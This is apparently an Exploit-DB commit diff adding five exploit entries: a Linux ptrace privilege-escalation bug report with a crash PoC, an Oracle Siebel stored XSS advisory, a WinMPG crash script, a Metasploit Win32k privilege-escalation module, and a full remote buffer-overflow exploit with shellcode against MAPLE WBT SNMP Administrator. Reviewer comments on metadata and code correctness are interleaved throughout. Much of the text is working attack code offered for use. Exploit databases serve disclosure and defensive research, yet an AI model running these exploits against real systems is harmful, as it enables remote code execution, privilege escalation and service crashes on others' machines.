DB: 2019-07-18

5 changes to exploits/shellcodes

WinMPG iPod Convert 3.0 - 'Register' Denial of Service
Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME
Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)
MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow
Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting
Offensive Security 2019-07-18 05:02:15 +00:00
parent 2935a5c0af
commit 40febc17ca
6 changed files with 533 additions and 0 deletions

exploits/linux/local/47133.txt

@ -0,0 +1,196 @@
== Summary ==
This bug report describes two issues introduced by commit 64b875f7ac8a ("ptrace:
Capture the ptracer's creds not PT_PTRACE_CAP", introduced in v4.10 but also
stable-backported to older versions). I will send a suggested patch in a minute
("ptrace: Fix ->ptracer_cred handling for PTRACE_TRACEME").
When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU reference
to the parent's objective credentials, then give that pointer to
get_cred(). However, the object lifetime rules for things like struct cred
do not permit unconditionally turning an RCU reference into a stable
reference.
PTRACE_TRACEME records the parent's credentials as if the parent was acting
as the subject, but that's not the case. If a malicious unprivileged child
uses PTRACE_TRACEME and the parent is privileged, and at a later point, the
parent process becomes attacker-controlled (because it drops privileges and
calls execve()), the attacker ends up with control over two processes with
a privileged ptrace relationship, which can be abused to ptrace a suid
binary and obtain root privileges.
== Long bug description ==
While I was trying to refactor the cred_guard_mutex logic, I stumbled over the
following issues:
ptrace relationships can be set up in two ways: Either the tracer attaches to
another process (PTRACE_ATTACH/PTRACE_SEIZE), or the tracee forces its parent to
attach to it (PTRACE_TRACEME).
When a tracee goes through a privilege-gaining execve(), the kernel checks
whether the ptrace relationship is privileged. If it is not, the
privilege-gaining effect of execve is suppressed.
The idea here is that a privileged tracer (e.g. if root runs "strace" on
some process) is allowed to trace through setuid/setcap execution, but an
unprivileged tracer must not be allowed to do that, since it could otherwise
inject arbitrary code into privileged processes.
In the PTRACE_ATTACH/PTRACE_SEIZE case, the tracer's credentials are recorded at
the time it calls PTRACE_ATTACH/PTRACE_SEIZE; later, when the tracee goes
through execve(), it is checked whether the recorded credentials are capable
over the tracee's user namespace.
But in the PTRACE_TRACEME case, the kernel also records _the tracer's_
credentials, even though the tracer is not requesting the operation. There are
two problems with that.
First, there is an object lifetime issue:
ptrace_traceme() -> ptrace_link() grabs __task_cred(new_parent) in an RCU
read-side critical section, then passes the creds to __ptrace_link(), which
calls get_cred() on them. If the parent concurrently switches its creds (e.g.
via setresuid()), the creds' refcount may already be zero, in which case
put_cred_rcu() will already have been scheduled. The kernel usually manages to
panic() before memory corruption occurs here using the following code in
put_cred_rcu(); however, I think memory corruption would also be possible if
this code races exactly the right way.
if (atomic_read(&cred->usage) != 0)
panic("CRED: put_cred_rcu() sees %p with usage %d\n",
cred, atomic_read(&cred->usage));
A simple PoC to trigger this bug:
============================
#define _GNU_SOURCE
#include <unistd.h>
#include <signal.h>
#include <sched.h>
#include <err.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <sys/ptrace.h>
int grandchild_fn(void *dummy) {
if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))
err(1, "traceme");
return 0;
}
int main(void) {
pid_t child = fork();
if (child == -1) err(1, "fork");
/* child */
if (child == 0) {
static char child_stack[0x100000];
prctl(PR_SET_PDEATHSIG, SIGKILL);
while (1) {
if (clone(grandchild_fn, child_stack+sizeof(child_stack), CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_PARENT|CLONE_VM|CLONE_SIGHAND|CLONE_SYSVSEM|CLONE_VFORK, NULL) == -1)
err(1, "clone failed");
}
}
/* parent */
uid_t uid = getuid();
while (1) {
if (setresuid(uid, uid, uid)) err(1, "setresuid");
}
}
============================
Result:
============================
[ 484.576983] ------------[ cut here ]------------
[ 484.580565] kernel BUG at kernel/cred.c:138!
[ 484.585278] Kernel panic - not syncing: CRED: put_cred_rcu() sees 000000009e024125 with usage 1
[ 484.589063] CPU: 1 PID: 1908 Comm: panic Not tainted 5.2.0-rc7 #431
[ 484.592410] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
[ 484.595843] Call Trace:
[ 484.598688] <IRQ>
[ 484.601451] dump_stack+0x7c/0xbb
[...]
[ 484.607349] panic+0x188/0x39a
[...]
[ 484.622650] put_cred_rcu+0x112/0x120
[...]
[ 484.628580] rcu_core+0x664/0x1260
[...]
[ 484.646675] __do_softirq+0x11d/0x5dd
[ 484.649523] irq_exit+0xe3/0xf0
[ 484.652374] smp_apic_timer_interrupt+0x103/0x320
[ 484.655293] apic_timer_interrupt+0xf/0x20
[ 484.658187] </IRQ>
[ 484.660928] RIP: 0010:do_error_trap+0x8d/0x110
[ 484.664114] Code: da 4c 89 ee bf 08 00 00 00 e8 df a5 09 00 3d 01 80 00 00 74 54 48 8d bb 90 00 00 00 e8 cc 8e 29 00 f6 83 91 00 00 00 02 75 2b <4c> 89 7c 24 40 44 8b 4c 24 04 48 83 c4 08 4d 89 f0 48 89 d9 4c 89
[ 484.669035] RSP: 0018:ffff8881ddf2fd58 EFLAGS: 00000246 ORIG_RAX: ffffffffffffff13
[ 484.672784] RAX: 0000000000000000 RBX: ffff8881ddf2fdb8 RCX: ffffffff811144dd
[ 484.676450] RDX: 0000000000000007 RSI: dffffc0000000000 RDI: ffff8881eabc4bf4
[ 484.680306] RBP: 0000000000000006 R08: fffffbfff0627a02 R09: 0000000000000000
[ 484.684033] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000004
[ 484.687697] R13: ffffffff82618dc0 R14: 0000000000000000 R15: ffffffff810c99d5
[...]
[ 484.700626] do_invalid_op+0x31/0x40
[...]
[ 484.707183] invalid_op+0x14/0x20
[ 484.710499] RIP: 0010:__put_cred+0x65/0x70
[ 484.713598] Code: 48 8d bd 90 06 00 00 e8 49 e2 1f 00 48 3b 9d 90 06 00 00 74 19 48 8d bb 90 00 00 00 48 c7 c6 50 98 0c 81 5b 5d e9 ab 1f 08 00 <0f> 0b 0f 0b 0f 0b 0f 1f 44 00 00 55 53 48 89 fb 48 81 c7 90 06 00
[ 484.718633] RSP: 0018:ffff8881ddf2fe68 EFLAGS: 00010202
[ 484.722407] RAX: 0000000000000001 RBX: ffff8881f38a4600 RCX: ffffffff810c9987
[ 484.726147] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8881f38a4600
[ 484.730049] RBP: ffff8881f38a4600 R08: ffffed103e7148c1 R09: ffffed103e7148c1
[ 484.733857] R10: 0000000000000001 R11: ffffed103e7148c0 R12: ffff8881eabc4380
[ 484.737923] R13: 00000000000003e8 R14: ffff8881f1a5b000 R15: ffff8881f38a4778
[...]
[ 484.748760] commit_creds+0x41c/0x520
[...]
[ 484.756115] __sys_setresuid+0x1cb/0x1f0
[ 484.759634] do_syscall_64+0x5d/0x260
[ 484.763024] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 484.766441] RIP: 0033:0x7fcab9bb4845
[ 484.769839] Code: 0f 1f 44 00 00 48 83 ec 38 64 48 8b 04 25 28 00 00 00 48 89 44 24 28 31 c0 8b 05 a6 8e 0f 00 85 c0 75 2a b8 75 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 53 48 8b 4c 24 28 64 48 33 0c 25 28 00 00 00
[ 484.775183] RSP: 002b:00007ffe01137aa0 EFLAGS: 00000246 ORIG_RAX: 0000000000000075
[ 484.779226] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcab9bb4845
[ 484.783057] RDX: 00000000000003e8 RSI: 00000000000003e8 RDI: 00000000000003e8
[ 484.787101] RBP: 00007ffe01137af0 R08: 0000000000000000 R09: 00007fcab9caf500
[ 484.791045] R10: fffffffffffff4d4 R11: 0000000000000246 R12: 00005573b2f240b0
[ 484.794891] R13: 00007ffe01137bd0 R14: 0000000000000000 R15: 0000000000000000
[ 484.799171] Kernel Offset: disabled
[ 484.802932] ---[ end Kernel panic - not syncing: CRED: put_cred_rcu() sees 000000009e024125 with usage 1 ]---
============================
The second problem is that, because the PTRACE_TRACEME case grabs the
credentials of a potentially unaware tracer, it can be possible for a normal
user to create and use a ptrace relationship that is marked as privileged even
though no privileged code ever requested or used that ptrace relationship.
This requires the presence of a setuid binary with certain behavior: It has to
drop privileges and then become dumpable again (via prctl() or execve()).
- task A: fork()s a child, task B
- task B: fork()s a child, task C
- task B: execve(/some/special/suid/binary)
- task C: PTRACE_TRACEME (creates privileged ptrace relationship)
- task C: execve(/usr/bin/passwd)
- task B: drop privileges (setresuid(getuid(), getuid(), getuid()))
- task B: become dumpable again (e.g. execve(/some/other/binary))
- task A: PTRACE_ATTACH to task B
- task A: use ptrace to take control of task B
- task B: use ptrace to take control of task C
Polkit's pkexec helper fits this pattern. On a typical desktop system, any
process running under an active local session can invoke some helpers through
pkexec (see configuration in /usr/share/polkit-1/actions, search for <action>s
that specify <allow_active>yes</allow_active> and
<annotate key="org.freedesktop.policykit.exec.path">...</annotate>).
While pkexec is normally used to run programs as root, pkexec actually allows
its caller to specify the user to run a command as with --user, which permits
using pkexec to run a command as the user who executed pkexec. (Which is kinda
weird... why would I want to run pkexec helpers as more than one fixed user?)
I have attached a proof-of-concept that works on Debian 10 running a distro
kernel and the XFCE desktop environment; if you use a different desktop
environment, you may have to add a path to the `helpers` array in the PoC. When
you compile and run it in an active local session, you should get a root shell
within a second.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
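Review bot: the entry carries no affected-version range and no fix reference beyond "introduced in v4.10 but also stable-backported to older versions" and the title of a proposed patch ("ptrace: Fix ->ptracer_cred handling for PTRACE_TRACEME"); before this lands in the database the header should record the upstream fix commit (a labelled placeholder until it is merged) and the kernel versions that ship it, since that is what a defender needs to triage. Two points from the body are worth surfacing at the top: the short PoC in the report only reproduces the put_cred_rcu() panic (a crash, useful for confirming a fix), and the privilege-escalation path depends on a setuid helper that drops privileges and then becomes dumpable again, with pkexec as the named example, so the `helpers` array in the attached archive is an environment dependency rather than a universal primitive.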

exploits/linux/webapps/47132.txt

@ -0,0 +1,35 @@
# Exploit Title: Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting
# Date: 2019-07-17
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Vendor Homepage: www.oracle.com
# Software Link: https://www.oracle.com/applications/siebel/
# Version: Siebel CRM (UI Framework) Version 19.0 and prior
# CVE: N/A
# Greetings: Deepu.tv
# PoC Exploit: Persistent Cross Site Scripting by Insecure File Upload
-----------------------------------------------------------------------
Vulnerable URL: http://<Siebel_Application>/finsadm_enu/start.swe?SWECmd=GotoView&SWEView=Activity+Attachment+View
#Steps to exploit the issue:
#1. Login to the CRM application and navigate to Activities and click on All Activities.
#2. Edit one of the existing activity, or create a new one.
#3. Use the New File menu in attachments section to upload an HTML file with JavaScript payload (via a proxy tool).
#4. JavaScript payload will be triggered/rendered upon the victim user views the attached file.
# Description: The Siebel CRM application allows its users to upload any file types in most of the available file upload functionalities, later on, the uploaded file can be downloaded by another user with the appropriate privileges as part of the workflow. As such, it was possible to upload file with the “html” extension, (containing html and JavaScript code) thereby allowing to also perform Persistent Cross Site Scripting attack.
# Impact: Cross-Site Scripting attacks do not target the server but rather its users. A hypothetical attacker could use the web server in order to trick other users into unwillingly executing malicious code saved on the server with XSS payload. The impacts of such attack can range from the disclosure of the users sensitive information to execution of arbitrary code on the target users system.
# Solution: Apply the Oracle Siebel CRM patch released on 16 July 2019
########################################
# Vulnerability Disclosure Timeline:
2017-December-23: Discovered vulnerability
2017-December-25: Vendor Notification
2017-December-27: Vendor Response/Feedback
2019-July-16: Vendor Fix/Patch
2019-July-17: Public Disclosure
########################################
Warm regards,
Sarath Nair
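Review bot: the header states `CVE: N/A` while the Solution line points at an Oracle patch released on 16 July 2019; if that fix shipped through an Oracle Critical Patch Update, the advisory URL and any identifier assigned there belong in the header so the entry is searchable, and `Version: 19.0 and prior` should be paired with the first fixed version. The Description leaves the root cause implicit: the application accepts any file type on upload and later serves the file to another user in a browser context, so the entry should name the controls a deployer without the patch needs (an upload allow-list by extension and content type, and serving attachments with `Content-Disposition: attachment` or from a separate origin). Style: the `Vulnerable URL` line and the timeline block lack the `#` prefix used by the rest of the header.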

exploits/windows/dos/47131.py Executable file

@ -0,0 +1,26 @@
# Exploit Title: WinMPG iPod Convert 3.0 - 'Register' Denial of Service
# Date: 2019-07-16
# Vendor Homepage:http://www.winmpg.com
# Software Link: https://www.techspot.com/downloads/downloadnow/6192/?evp=d62142990e9320a4e811b283fdcc4060&file=
# Exploit Author: stresser
# Tested Version: 3.0
# Tested on: Windows XP SP3 EN
# 1.- Run python code :WinMPG.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open WinMPG and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and User Code'
# 5.- Click 'Ok'and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
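Review bot: the shebang `#!/usr/bin/env python` sits below the comment header instead of on line 1, so it has no effect, and the steps tell the reader to open `EVIL.txt` while the script writes `Evil.txt`; on a case-sensitive filesystem that mismatch breaks the reproduction, so move the shebang to the first line and use one spelling in both places. Minor: the `print` statements are Python 2 only, the bare `except:` hides the actual error (`except IOError as e:` and printing `e` would be more useful), and `Vendor Homepage:http://www.winmpg.com` is missing a space after the colon.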

exploits/windows/local/47134.rb Executable file

@ -0,0 +1,106 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Windows NtUserSetWindowFNID Win32k User Callback',
'Description' => %q{
An elevation of privilege vulnerability exists in Windows when the Win32k component
fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability."
This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows
Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,
Windows 10, Windows 10 Servers.
This module is tested against Windows 10 v1703 x86.
},
'License' => MSF_LICENSE,
'Author' => [
'ze0r', # Exploit analysis and PoC
'Kaspersky Lab', # Vulnerability discovery/detection
'Jacob Robles' # Metasploit module
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Windows 10 v1703 (Build 15063) x86', {
'UniqueProcessIdOffset' => 180,
'TokenOffset' => 252,
'Version' => 'Windows 10 (Build 15063)'
}
]
],
'References' => [
['CVE', '2018-8453'],
['URL', 'https://github.com/ze0r/cve-2018-8453-exp'],
['URL', 'https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig'],
['URL', 'https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ'],
['URL', 'https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453']
],
'Notes' => {
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
'Stability' => [CRASH_OS_RESTARTS]
},
'DisclosureDate' => '2018-10-09',
'DefaultTarget' => 0
))
end
def target_info
fail_with(Failure::None, 'Session is already elevated') if is_system?
unless sysinfo['OS'].start_with?(target['Version']) && sysinfo['Architecture'] == 'x86'
fail_with(Failure::NoTarget, 'Target is not compatible with exploit')
end
end
def write_file_to_target(fname, data)
tempdir = session.sys.config.getenv('TEMP')
file_loc = "#{tempdir}\\#{fname}"
vprint_warning("Attempting to write #{fname} to #{tempdir}")
write_file(file_loc, data)
vprint_good("#{fname} written")
file_loc
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
end
def exploit
target_info
exe_name = 'CVE-2018-8453.exe'
exe_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8453', exe_name)
vprint_status("Reading payload from file #{exe_path}")
raw = File.read(exe_path)
tmp_exe = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
vprint_status("Uploading exploit exe as: #{tmp_exe}")
exe_rpath = write_file_to_target(tmp_exe, raw)
register_file_for_cleanup(exe_rpath)
tmp_payload = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
payload_rpath = write_file_to_target(tmp_payload, generate_payload_exe)
vprint_status("Uploading payload #{tmp_payload}")
register_file_for_cleanup(payload_rpath)
command = "\"#{exe_rpath}\" \"#{payload_rpath}\" #{target['UniqueProcessIdOffset']} #{target['TokenOffset']}"
vprint_status("Executing command: #{command}")
session.sys.process.execute(command, nil, {'Hidden' => false})
print_good('Exploit finished, wait for privileged payload execution to complete.')
end
end
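Review bot: in `exploit`, the `vprint_status("Uploading payload #{tmp_payload}")` line is printed after `write_file_to_target` has already returned, so a failed write reports through `fail_with` before the user sees what was being uploaded; swap the two lines to match the ordering used for the exploit exe a few lines above. On the metadata: `Stability` is `CRASH_OS_RESTARTS` and the module executes a precompiled `CVE-2018-8453.exe` from the data directory whose source is not part of this commit; the `ze0r` repository is listed as a reference but is not tied to a specific commit or hash, and that build provenance should be stated in the module. From a detection standpoint, the module writes two randomly named `.exe` files to `%TEMP%` and launches one with `'Hidden' => false`, which is visible on the desktop and straightforward to alert on.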

exploits/windows/remote/47130.txt

@ -0,0 +1,165 @@
# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow
# Author: hyp3rlinx
# Discovery Date: 2019-07-17
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows
# CVE: CVE-2019-13577
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
[+] ISR: Apparition Security
[Vendor]
www.computerlab.com
[Product]
MAPLE Computer WBT SNMP Administrator (Thin Client Administrator)
v2.0.195.15
https://www.computerlab.com/index.php/downloads/category/27-device-manager
ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4
The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients.
This software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol).
Agents are built into the clients for remote management and configuration.
[Vulnerability Type]
Unauthenticated Remote Buffer Overflow Code Execution 0day
[CVE Reference]
CVE-2019-13577
[Security Issue]
SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987.
This will overwrite data on the stack/registers and allow for control of the programs execution flow resulting in attacker supplied remote code execution.
Authentication is not required for this exploit.
This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code.
When installing the vulnerable program if asks for a serial number just enter a value of "1" or something.
Upon launching the program if any errors occur try right click SnmpAdm.exe and run it as Admin.
Interestingly, it seems to drop DLLs with .tmp extensions in AppData\Local\Temp directory, make OS system files viewable in explorer to see them.
e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp
ASLR / SEH all set to False helping to make exploit more portable.
CALL EBX
10008FB3 0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll)
Stack dump:
EAX 41414141
ECX 0018FEFC
EDX 0018FF10
EBX 022DDA78 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0018FECC
EBP 0018FEF4
ESI 0018FF10
EDI 0018FEFC
EIP 41414141
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_NO_SCROLLBARS (000005A7)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
[Exploit/POC]
from socket import *
import struct,sys,argparse
#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
#CVE-2019-13577
#Remote Buffer Overflow 0day
#hyp3rlinx - ApparitionSec
#Pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
eip = struct.pack("<L", 0x10008fb3) #JMP EBX
popebx = struct.pack("<L", 0x022C0012) #5B POP EBX
buf0="B"*693704
buf1=eip
buf2=popebx+sc+"R"*899+"W"*23975
payload=buf0+buf1+buf2
def doit(IP,payload):
try:
s=socket(AF_INET, SOCK_STREAM)
s.connect((IP, 987))
s.send(payload)
print "CVE-2019-13577 - WBT SNMP Administrator Buffer Overflow 0day."
print "hyp3rlinx"
s.close()
except Exception as e:
print str(e)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ipaddress", help="IP of Target CVE-2019-13577")
return parser.parse_args()
def main(args):
doit(args.ipaddress,payload)
if __name__ == "__main__":
if not len(sys.argv) > 1:
print "[*] No args supplied see Help -h"
exit()
main(parse_args())
[POC Video URL]
https://www.youtube.com/watch?v=THMqueCIrFw
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: July 10, 2019
Second vendor notification attempt: July 13, 2019
No vendor replies.
July 17, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
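Review bot: `s.send(payload)` is not guaranteed to transmit the whole buffer (roughly 700 KB here) in one call; `s.sendall(payload)` is the correct call, and the `print` statements are Python 2 only. The `popebx` address `0x022C0012` is not inside `ipwSNMPv5.dll` (the mona line only covers the `call ebx` at `0x10008fb3`) and lies in the same region as the `EBX 022DDA78` value in the stack dump, so it is an environment-specific address and the "Windows 7 SP1" caveat should be stated as a portability limit next to it. In the product description, "Simple Network Communication Protocol" should read "Simple Network Management Protocol", and "if asks for a serial number" should read "it asks". Given the "No vendor replies" timeline, the only mitigation the text supports is restricting reachability of the CE Remote listener on TCP 987, which deserves a line of its own under [Security Issue].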


@ -6510,6 +6510,7 @@ id,file,description,date,author,type,platform,port
47119,exploits/android/dos/47119.txt,"Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write",2019-07-15,"Marcin Kozlowski",dos,android,
47120,exploits/windows/dos/47120.rb,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)",2019-07-15,"RAMELLA Sebastien",dos,windows,3389
47127,exploits/windows/dos/47127.txt,"Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection",2019-07-16,hyp3rlinx,dos,windows,
47131,exploits/windows/dos/47131.py,"WinMPG iPod Convert 3.0 - 'Register' Denial of Service",2019-07-17,stresser,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10596,6 +10597,8 @@ id,file,description,date,author,type,platform,port
47122,exploits/windows/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows,
47126,exploits/windows/local/47126.py,"DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)",2019-07-16,"Xavi Beltran",local,windows,
47128,exploits/windows/local/47128.rb,"Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)",2019-07-16,Metasploit,local,windows,
47133,exploits/linux/local/47133.txt,"Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME",2019-07-17,"Google Security Research",local,linux,
47134,exploits/windows/local/47134.rb,"Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)",2019-07-17,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17555,6 +17558,7 @@ id,file,description,date,author,type,platform,port
47080,exploits/unix/remote/47080.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",2019-07-07,"Brian Peters",remote,unix,80
47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple,
47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
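Review bot: the port column for 47130 is left empty although the advisory it indexes states that the vulnerable CE Remote feature listens on TCP 987; other remote entries in this region carry their port (80, 139), so fill in `987` to keep the column usable for filtering and for defenders looking up exposed services.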
@ -41507,3 +41511,4 @@ id,file,description,date,author,type,platform,port
47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux,
47124,exploits/linux/webapps/47124.txt,"CentOS Control Web Panel 0.9.8.836 - Privilege Escalation",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
47132,exploits/linux/webapps/47132.txt,"Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting",2019-07-17,"Sarath Nair",webapps,linux,
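Review bot: 47132 is filed with platform `linux`, but the Siebel advisory describes a browser-side persistent XSS in a web application and names no operating system; `multiple`, as used for the Xymon entry in the remote section above, would be the more accurate platform value.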
